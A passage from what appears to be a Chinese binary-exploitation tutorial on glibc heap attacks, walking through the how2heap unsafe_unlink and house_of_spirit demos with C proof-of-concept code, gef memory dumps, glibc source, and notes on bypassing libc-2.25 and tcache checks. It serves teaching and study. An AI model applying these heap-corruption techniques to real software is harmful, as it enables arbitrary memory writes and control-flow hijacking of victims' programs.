gef➤  x/15gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000021  <-- chunk p4, chunk p5
0x602010:   0x4444444444444444  0x00007ffff7dd1b00
0x602020:   0x0000000000000020  0x0000000000000021  <-- chunk p2
0x602030:   0x4242424242424242  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000411  <-- chunk p3
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000

chunk p4 和 p5 在同一位置。

unsafe_unlink

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>

uint64_t *chunk0_ptr;

int main() {
    int malloc_size = 0x80; // not fastbins
    int header_size = 2;

    chunk0_ptr = (uint64_t*) malloc(malloc_size); //chunk0
    uint64_t *chunk1_ptr  = (uint64_t*) malloc(malloc_size); //chunk1
    fprintf(stderr, "The global chunk0_ptr is at %p, pointing to %p\n", &chunk0_ptr, chunk0_ptr);
    fprintf(stderr, "The victim chunk we are going to corrupt is at %p\n\n", chunk1_ptr);

    // pass this check: (P->fd->bk != P || P->bk->fd != P) == False
    chunk0_ptr[2] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*3);
    chunk0_ptr[3] = (uint64_t) &chunk0_ptr-(sizeof(uint64_t)*2);
    fprintf(stderr, "Fake chunk fd: %p\n", (void*) chunk0_ptr[2]);
    fprintf(stderr, "Fake chunk bk: %p\n\n", (void*) chunk0_ptr[3]);
    // pass this check: (chunksize(P) != prev_size (next_chunk(P)) == False
    // chunk0_ptr[1] = 0x0; // or 0x8, 0x80

    uint64_t *chunk1_hdr = chunk1_ptr - header_size;
    chunk1_hdr[0] = malloc_size;
    chunk1_hdr[1] &= ~1;

    // deal with tcache
    // int *a[10];
    // int i;
    // for (i = 0; i < 7; i++) {
    //   a[i] = malloc(0x80);
    // }
    // for (i = 0; i < 7; i++) {
    //   free(a[i]);
    // }
    free(chunk1_ptr);

    char victim_string[9];
    strcpy(victim_string, "AAAAAAAA");
    chunk0_ptr[3] = (uint64_t) victim_string;
    fprintf(stderr, "Original value: %s\n", victim_string);

    chunk0_ptr[0] = 0x4242424242424242LL;
    fprintf(stderr, "New Value: %s\n", victim_string);
}

$ gcc -g unsafe_unlink.c
$ ./a.out
The global chunk0_ptr is at 0x601070, pointing to 0x721010
The victim chunk we are going to corrupt is at 0x7210a0

Fake chunk fd: 0x601058
Fake chunk bk: 0x601060

Original value: AAAAAAAA
New Value: BBBBBBBB

这个程序展示了怎样利用 free 改写全局指针 chunk0_ptr 达到任意内存写的目的，即 unsafe unlink。该技术最常见的利用场景是我们有一个可以溢出漏洞和一个全局指针。

Ubuntu16.04 使用 libc-2.23，其中 unlink 实现的代码如下，其中有一些对前后堆块的检查，也是我们需要绕过的：

/* Take a chunk off a bin list */
#define unlink(AV, P, BK, FD) {                                            \
    FD = P->fd;								      \
    BK = P->bk;								      \
    if (__builtin_expect (FD->bk != P || BK->fd != P, 0))		      \
      malloc_printerr (check_action, "corrupted double-linked list", P, AV);  \
    else {								      \
        FD->bk = BK;							      \
        BK->fd = FD;							      \
        if (!in_smallbin_range (P->size)				      \
            && __builtin_expect (P->fd_nextsize != NULL, 0)) {		      \
	    if (__builtin_expect (P->fd_nextsize->bk_nextsize != P, 0)	      \
		|| __builtin_expect (P->bk_nextsize->fd_nextsize != P, 0))    \
	      malloc_printerr (check_action,				      \
			       "corrupted double-linked list (not small)",    \
			       P, AV);					      \
            if (FD->fd_nextsize == NULL) {				      \
                if (P->fd_nextsize == P)				      \
                  FD->fd_nextsize = FD->bk_nextsize = FD;		      \
                else {							      \
                    FD->fd_nextsize = P->fd_nextsize;			      \
                    FD->bk_nextsize = P->bk_nextsize;			      \
                    P->fd_nextsize->bk_nextsize = FD;			      \
                    P->bk_nextsize->fd_nextsize = FD;			      \
                  }							      \
              } else {							      \
                P->fd_nextsize->bk_nextsize = P->bk_nextsize;		      \
                P->bk_nextsize->fd_nextsize = P->fd_nextsize;		      \
              }								      \
          }								      \
      }									      \
}

在解链操作之前，针对堆块 P 自身的 fd 和 bk 检查了链表的完整性，即判断堆块 P 的前一块 fd 的指针是否指向 P，以及后一块 bk 的指针是否指向 P。

malloc_size 设置为 0x80，可以分配 small chunk，然后定义 header_size 为 2。申请两块空间，全局指针 chunk0_ptr 指向 chunk0，局部指针 chunk1_ptr 指向 chunk1：

gef➤  p &chunk0_ptr
$1 = (uint64_t **) 0x601070 <chunk0_ptr>
gef➤  x/gx &chunk0_ptr
0x601070 <chunk0_ptr>:  0x0000000000602010
gef➤  p &chunk1_ptr
$2 = (uint64_t **) 0x7fffffffdc60
gef➤  x/gx &chunk1_ptr
0x7fffffffdc60: 0x00000000006020a0
gef➤  x/40gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000091  <-- chunk 0
0x602010:   0x0000000000000000  0x0000000000000000
0x602020:   0x0000000000000000  0x0000000000000000
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000000  0x0000000000000091  <-- chunk 1
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0:   0x0000000000000000  0x0000000000000000
0x6020f0:   0x0000000000000000  0x0000000000000000
0x602100:   0x0000000000000000  0x0000000000000000
0x602110:   0x0000000000000000  0x0000000000000000
0x602120:   0x0000000000000000  0x0000000000020ee1  <-- top chunk
0x602130:   0x0000000000000000  0x0000000000000000

接下来要绕过 (P->fd->bk != P || P->bk->fd != P) == False 的检查，这个检查有个缺陷，就是 fd/bk 指针都是通过与 chunk 头部的相对地址来查找的。所以我们可以利用全局指针 chunk0_ptr 构造 fake chunk 来绕过它：

gef➤  x/40gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000091  <-- chunk 0
0x602010:   0x0000000000000000  0x0000000000000000  <-- fake chunk P
0x602020:   0x0000000000601058  0x0000000000601060      <-- fd, bk pointer
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000080  0x0000000000000090  <-- chunk 1 <-- prev_size
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0:   0x0000000000000000  0x0000000000000000
0x6020f0:   0x0000000000000000  0x0000000000000000
0x602100:   0x0000000000000000  0x0000000000000000
0x602110:   0x0000000000000000  0x0000000000000000
0x602120:   0x0000000000000000  0x0000000000020ee1  <-- top chunk
0x602130:   0x0000000000000000  0x0000000000000000
gef➤  x/5gx 0x601058
0x601058:   0x0000000000000000  0x00007ffff7dd2540  <-- fake chunk FD
0x601068:   0x0000000000000000  0x0000000000602010      <-- bk pointer
0x601078:   0x0000000000000000
gef➤  x/5gx 0x601060
0x601060:   0x00007ffff7dd2540  0x0000000000000000  <-- fake chunk BK
0x601070:   0x0000000000602010  0x0000000000000000      <-- fd pointer
0x601080:   0x0000000000000000

可以看到，我们在 chunk0 里构造一个 fake chunk，用 P 表示，两个指针 fd 和 bk 可以构成两条链：P->fd->bk == P，P->bk->fd == P，可以绕过检查。另外利用 chunk0 的溢出漏洞，通过修改 chunk 1 的 prev_size 为 fake chunk 的大小，修改 PREV_INUSE 标志位为 0，将 fake chunk 伪造成一个 free chunk。

接下来就是释放掉 chunk1，这会触发 fake chunk 的 unlink 并覆盖 chunk0_ptr 的值。unlink 操作是这样进行的：

FD = P->fd;
BK = P->bk;
FD->bk = BK
BK->fd = FD

根据 fd 和 bk 指针在 malloc_chunk 结构体中的位置，这段代码等价于：

FD = P->fd = &P - 24
BK = P->bk = &P - 16
FD->bk = *(&P - 24 + 24) = P
FD->fd = *(&P - 16 + 16) = P

这样就通过了 unlink 的检查，最终效果为：

FD->bk = P = BK = &P - 16
BK->fd = P = FD = &P - 24

原本指向堆上 fake chunk 的指针 P 指向了自身地址减 24 的位置，这就意味着如果程序功能允许堆 P 进行写入，就能改写 P 指针自身的地址，从而造成任意内存写入。若允许堆 P 进行读取，则会造成信息泄漏。

在这个例子中，由于 P->fd->bk 和 P->bk->fd 都指向 P，所以最后的结果为：

chunk0_ptr = P = P->fd

成功地修改了 chunk0_ptr，这时 chunk0_ptr 和 chunk0_ptr[3] 实际上就是同一东西。这里可能会有疑惑为什么这两个东西是一样的，因为 chunk0_ptr 指针在是放在数据段上的，地址在 0x601070，指向 0x601058，而 chunk0_ptr[3] 的意思是从 chunk0_ptr 指向的地方开始数 3 个单位，所以 0x601058+0x08*3=0x601070：

gef➤  x/40gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000091  <-- chunk 0
0x602010:   0x0000000000000000  0x0000000000020ff1  <-- fake chunk P
0x602020:   0x0000000000601058  0x0000000000601060      <-- fd, bk pointer
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000080  0x0000000000000090  <-- chunk 1 [be freed]
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0:   0x0000000000000000  0x0000000000000000
0x6020f0:   0x0000000000000000  0x0000000000000000
0x602100:   0x0000000000000000  0x0000000000000000
0x602110:   0x0000000000000000  0x0000000000000000
0x602120:   0x0000000000000000  0x0000000000020ee1  <-- top chunk
0x602130:   0x0000000000000000  0x0000000000000000
gef➤  x/5gx 0x601058
0x601058:   0x0000000000000000  0x00007ffff7dd2540  <-- fake chunk FD
0x601068:   0x0000000000000000  0x0000000000601058      <-- bk pointer
0x601078:   0x0000000000000000
gef➤  x/5gx 0x601060
0x601060:   0x00007ffff7dd2540  0x0000000000000000  <-- fake chunk BK
0x601070:   0x0000000000601058  0x0000000000000000      <-- fd pointer
0x601080:   0x0000000000000000
gef➤  x/gx chunk0_ptr
0x601058:   0x0000000000000000
gef➤  x/gx chunk0_ptr[3]
0x601058:   0x0000000000000000

所以，修改 chunk0_ptr[3] 就等于修改 chunk0_ptr：

gef➤  x/5gx 0x601058
0x601058:   0x0000000000000000  0x00007ffff7dd2540
0x601068:   0x0000000000000000  0x00007fffffffdc70  <-- chunk0_ptr[3]
0x601078:   0x0000000000000000
gef➤  x/gx chunk0_ptr
0x7fffffffdc70: 0x4141414141414141

这时 chunk0_ptr 就指向了 victim_string，修改它：

gef➤  x/gx chunk0_ptr
0x7fffffffdc70: 0x4242424242424242

成功达成修改任意地址的成就。

最后看一点新的东西，libc-2.25 在 unlink 的开头增加了对 chunk_size == next->prev->chunk_size 的检查，以对抗单字节溢出的问题。补丁如下：

$ git show 17f487b7afa7cd6c316040f3e6c86dc96b2eec30 malloc/malloc.c
commit 17f487b7afa7cd6c316040f3e6c86dc96b2eec30
Author: DJ Delorie <dj@delorie.com>
Date:   Fri Mar 17 15:31:38 2017 -0400

    Further harden glibc malloc metadata against 1-byte overflows.

    Additional check for chunk_size == next->prev->chunk_size in unlink()

    2017-03-17  Chris Evans  <scarybeasts@gmail.com>

            * malloc/malloc.c (unlink): Add consistency check between size and
            next->prev->size, to further harden against 1-byte overflows.

diff --git a/malloc/malloc.c b/malloc/malloc.c
index e29105c372..994a23248e 100644
--- a/malloc/malloc.c
+++ b/malloc/malloc.c
@@ -1376,6 +1376,8 @@ typedef struct malloc_chunk *mbinptr;

 /* Take a chunk off a bin list */
 #define unlink(AV, P, BK, FD) {                                            \
+    if (__builtin_expect (chunksize(P) != prev_size (next_chunk(P)), 0))      \
+      malloc_printerr (check_action, "corrupted size vs. prev_size", P, AV);  \
     FD = P->fd;                                                                      \
     BK = P->bk;                                                                      \
     if (__builtin_expect (FD->bk != P || BK->fd != P, 0))                    \

具体是这样的：

/* Ptr to next physical malloc_chunk. */
#define next_chunk(p) ((mchunkptr) (((char *) (p)) + chunksize (p)))
/* Get size, ignoring use bits */
#define chunksize(p) (chunksize_nomask (p) & ~(SIZE_BITS))
/* Like chunksize, but do not mask SIZE_BITS.  */
#define chunksize_nomask(p)         ((p)->mchunk_size)
/* Size of the chunk below P.  Only valid if prev_inuse (P).  */
#define prev_size(p) ((p)->mchunk_prev_size)
/* Bits to mask off when extracting size  */
#define SIZE_BITS (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

回顾一下伪造出来的堆：

gef➤  x/40gx 0x602010-0x10
0x602000:   0x0000000000000000  0x0000000000000091  <-- chunk 0
0x602010:   0x0000000000000000  0x0000000000000000  <-- fake chunk P
0x602020:   0x0000000000601058  0x0000000000601060      <-- fd, bk pointer
0x602030:   0x0000000000000000  0x0000000000000000
0x602040:   0x0000000000000000  0x0000000000000000
0x602050:   0x0000000000000000  0x0000000000000000
0x602060:   0x0000000000000000  0x0000000000000000
0x602070:   0x0000000000000000  0x0000000000000000
0x602080:   0x0000000000000000  0x0000000000000000
0x602090:   0x0000000000000080  0x0000000000000090  <-- chunk 1 <-- prev_size
0x6020a0:   0x0000000000000000  0x0000000000000000
0x6020b0:   0x0000000000000000  0x0000000000000000
0x6020c0:   0x0000000000000000  0x0000000000000000
0x6020d0:   0x0000000000000000  0x0000000000000000
0x6020e0:   0x0000000000000000  0x0000000000000000
0x6020f0:   0x0000000000000000  0x0000000000000000
0x602100:   0x0000000000000000  0x0000000000000000
0x602110:   0x0000000000000000  0x0000000000000000
0x602120:   0x0000000000000000  0x0000000000020ee1  <-- top chunk
0x602130:   0x0000000000000000  0x0000000000000000

这里有三种办法可以绕过该检查：

什么都不做。
- chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x0
- prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x0) == 0x0
设置 chunk0_ptr[1] = 0x8。
- chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x8
- prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x8) == 0x8
设置 chunk0_ptr[1] = 0x80。
- chunksize(P) == chunk0_ptr[1] & (~ 0x7) == 0x80
- prev_size (next_chunk(P)) == prev_size (chunk0_ptr + 0x80) == 0x80

好的，现在 libc-2.25 版本下我们也能成功利用了。接下来更近一步，libc-2.26 怎么利用，首先当然要先知道它新增了哪些漏洞缓解措施，其中一个神奇的东西叫做 tcache，这是一种线程缓存机制，每个线程默认情况下有 64 个大小递增的 bins，每个 bin 是一个单链表，默认最多包含 7 个 chunk。其中缓存的 chunk 是不会被合并的，所以在释放 chunk 1 的时候，chunk0_ptr 仍然指向正确的堆地址，而不是之前的 chunk0_ptr = P = P->fd。为了解决这个问题，一种可能的办法是给填充进特定大小的 chunk 把 bin 占满，就像下面这样：

    // deal with tcache
    int *a[10];
    int i;
    for (i = 0; i < 7; i++) {
        a[i] = malloc(0x80);
    }
    for (i = 0; i < 7; i++) {
        free(a[i]);
    }

gef➤  p &chunk0_ptr
$2 = (uint64_t **) 0x555555755070 <chunk0_ptr>
gef➤  x/gx 0x555555755070
0x555555755070 <chunk0_ptr>:    0x00007fffffffdd0f
gef➤  x/gx 0x00007fffffffdd0f
0x7fffffffdd0f: 0x4242424242424242

现在 libc-2.26 版本下也成功利用了。tcache 是个很有趣的东西，更详细的内容我们会在专门的章节里去讲。

加上内存检测参数重新编译，可以看到 heap-buffer-overflow：

$ gcc -fsanitize=address -g unsafe_unlink.c
$ ./a.out
The global chunk0_ptr is at 0x602230, pointing to 0x60c00000bf80
The victim chunk we are going to corrupt is at 0x60c00000bec0

Fake chunk fd: 0x602218
Fake chunk bk: 0x602220

=================================================================
==5591==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c00000beb0 at pc 0x000000400d74 bp 0x7ffd06423730 sp 0x7ffd06423720
WRITE of size 8 at 0x60c00000beb0 thread T0
    #0 0x400d73 in main /home/firmy/how2heap/unsafe_unlink.c:26
    #1 0x7fc925d8282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #2 0x400968 in _start (/home/firmy/how2heap/a.out+0x400968)

0x60c00000beb0 is located 16 bytes to the left of 128-byte region [0x60c00000bec0,0x60c00000bf40)
allocated by thread T0 here:
    #0 0x7fc9261c4602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x400b12 in main /home/firmy/how2heap/unsafe_unlink.c:13
    #2 0x7fc925d8282f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

house_of_spirit

#include <stdio.h>
#include <stdlib.h>

int main() {
    malloc(1);

    fprintf(stderr, "We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.\n");
    unsigned long long *a, *b;
    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

    fprintf(stderr, "The first one:  %p\n", &fake_chunks[0]);
    fprintf(stderr, "The second one: %p\n", &fake_chunks[4]);

    fake_chunks[1] = 0x20;      // the size
    fake_chunks[5] = 0x1234;    // nextsize

    fake_chunks[2] = 0x4141414141414141LL;
    fake_chunks[6] = 0x4141414141414141LL;

    fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[0]);
    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[0], &fake_chunks[2]);
    b = malloc(0x10);
    fprintf(stderr, "malloc(0x10): %p\n", b);
    b[0] = 0x4242424242424242LL;
}

$ gcc -g house_of_spirit.c
$ ./a.out
We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.
The first one:  0x7ffc782dae00
The second one: 0x7ffc782dae20
Overwritting our pointer with the address of the fake region inside the fake first chunk, 0x7ffc782dae00.
Freeing the overwritten pointer.
Now the next malloc will return the region of our fake chunk at 0x7ffc782dae00, which will be 0x7ffc782dae10!
malloc(0x10): 0x7ffc782dae10

house-of-spirit 是一种 fastbins 攻击方法，通过构造 fake chunk，然后将其 free 掉，就可以在下一次 malloc 时返回 fake chunk 的地址，即任意我们可控的区域。house-of-spirit 是一种通过堆的 fast bin 机制来辅助栈溢出的方法，一般的栈溢出漏洞的利用都希望能够覆盖函数的返回地址以控制 EIP 来劫持控制流，但如果栈溢出的长度无法覆盖返回地址，同时却可以覆盖栈上的一个即将被 free 的堆指针，此时可以将这个指针改写为栈上的地址并在相应位置构造一个 fast bin 块的元数据，接着在 free 操作时，这个栈上的堆块被放到 fast bin 中，下一次 malloc 对应的大小时，由于 fast bin 的先进后出机制，这个栈上的堆块被返回给用户，再次写入时就可能造成返回地址的改写。所以利用的第一步不是去控制一个 chunk，而是控制传给 free 函数的指针，将其指向一个 fake chunk。所以 fake chunk 的伪造是关键。

首先 malloc(1) 用于初始化内存环境，然后在 fake chunk 区域伪造出两个 chunk。另外正如上面所说的，需要一个传递给 free 函数的可以被修改的指针，无论是通过栈溢出还是其它什么方式：

gef➤  x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000  0x0000000000000020  <-- fake chunk 1
0x7fffffffdcc0: 0x4141414141414141  0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001  0x0000000000001234  <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141  0x0000000000000000
gef➤  x/gx &a
0x7fffffffdca0: 0x0000000000000000

伪造 chunk 时需要绕过一些检查，首先是标志位，PREV_INUSE 位并不影响 free 的过程，但 IS_MMAPPED 位和 NON_MAIN_ARENA 位都要为零。其次，在 64 位系统中 fast chunk 的大小要在 32~128 字节之间。最后，是 next chunk 的大小，必须大于 2*SIZE_SZ（即大于16），小于 av->system_mem（即小于128kb），才能绕过对 next chunk 大小的检查。

libc-2.23 中这些检查代码如下：

void
__libc_free (void *mem)
{
  mstate ar_ptr;
  mchunkptr p;                          /* chunk corresponding to mem */

  [...]
  p = mem2chunk (mem);

  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
    {
      [...]
      munmap_chunk (p);
      return;
    }

  ar_ptr = arena_for_chunk (p);     // 获得 chunk 所属 arena 的地址
  _int_free (ar_ptr, p, 0);         // 当 IS_MMAPPED 为零时调用
}

mem 就是我们所控制的传递给 free 函数的地址。其中下面两个函数用于在 chunk 指针和 malloc 指针之间做转换：

/* conversion from malloc headers to user pointers, and back */

#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))

当 NON_MAIN_ARENA 为零时返回 main arena：

/* find the heap and corresponding arena for a given ptr */

#define heap_for_ptr(ptr) \
  ((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1)))
#define arena_for_chunk(ptr) \
  (chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena)

这样，程序就顺利地进入了 _int_free 函数：

static void
_int_free (mstate av, mchunkptr p, int have_lock)
{
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */

  [...]
  size = chunksize (p);

  [...]
  /*
    If eligible, place chunk on a fastbin so it can be found
    and used quickly in malloc.
  */

  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())

#if TRIM_FASTBINS
      /*
	If TRIM_FASTBINS set, don't place chunks
	bordering top into fastbins
      */
      && (chunk_at_offset(p, size) != av->top)
#endif
      ) {

    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
			     >= av->system_mem, 0))
      {
        [...]
	    errstr = "free(): invalid next size (fast)";
	    goto errout;
      }

    [...]
    set_fastchunks(av);
    unsigned int idx = fastbin_index(size);
    fb = &fastbin (av, idx);

    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
    mchunkptr old = *fb, old2;
    [...]
    do
      {
    [...]
	p->fd = old2 = old;
      }
    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);

其中下面的宏函数用于获得 next chunk：

/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))

然后修改指针 a 指向 (fake chunk 1 + 0x10) 的位置，即上面提到的 mem。然后将其传递给 free 函数，这时程序就会误以为这是一块真的 chunk，然后将其释放并加入到 fastbin 中。

gef➤  x/gx &a
0x7fffffffdca0: 0x00007fffffffdcc0
gef➤  x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000  0x0000000000000020  <-- fake chunk 1 [be freed]
0x7fffffffdcc0: 0x0000000000000000  0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001  0x0000000000001234  <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141  0x0000000000000000
0x7fffffffdcf0: 0x0000000000400820  0x00000000004005b0
gef➤  heap bins fast
[ Fastbins for arena 0x7ffff7dd1b20 ]
Fastbins[idx=0, size=0x10]  ←  Chunk(addr=0x7fffffffdcc0, size=0x20, flags=)

这时如果我们 malloc 一个对应大小的 fast chunk，程序将从 fastbins 中分配出这块被释放的 chunk。

gef➤  x/10gx &fake_chunks
0x7fffffffdcb0: 0x0000000000000000  0x0000000000000020  <-- new chunk
0x7fffffffdcc0: 0x4242424242424242  0x0000000000000000
0x7fffffffdcd0: 0x0000000000000001  0x0000000000001234  <-- fake chunk 2
0x7fffffffdce0: 0x4141414141414141  0x0000000000000000
0x7fffffffdcf0: 0x0000000000400820  0x00000000004005b0
gef➤  x/gx &b
0x7fffffffdca8: 0x00007fffffffdcc0

所以 house-of-spirit 的主要目的是，当我们伪造的 fake chunk 内部存在不可控区域时，运用这一技术可以将这片区域变成可控的。上面为了方便观察，在 fake chunk 里填充一些字母，但在现实中这些位置很可能是不可控的，而 house-of-spirit 也正是以此为目的而出现的。

该技术的缺点也是需要对栈地址进行泄漏，否则无法正确覆盖需要释放的堆指针，且在构造数据时，需要满足对齐的要求等。

加上内存检测参数重新编译，可以看到问题所在，即尝试 free 一块不是由 malloc 分配的 chunk：

$ gcc -fsanitize=address -g house_of_spirit.c
$ ./a.out
We will overwrite a pointer to point to a fake 'fastbin' region. This region contains two chunks.
The first one:  0x7fffa61d6c00
The second one: 0x7fffa61d6c20
Overwritting our pointer with the address of the fake region inside the fake first chunk, 0x7fffa61d6c00.
Freeing the overwritten pointer.
=================================================================
==5282==ERROR: AddressSanitizer: attempting free on address which was not malloc()-ed: 0x7fffa61d6c10 in thread T0
    #0 0x7fc4c3a332ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x400cab in main /home/firmyy/how2heap/house_of_spirit.c:24
    #2 0x7fc4c35f182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #3 0x4009b8 in _start (/home/firmyy/how2heap/a.out+0x4009b8)

house-of-spirit 在 libc-2.26 下的利用可以查看章节 4.14。

参考资料

how2heap
Heap Exploitation
<<Glibc堆利用的若干方法>>

Previous3.1.5 返回导向编程（ROP）（ARM）Next3.1.7 Linux 堆利用（二）

Last updated 3 years ago

Was this helpful?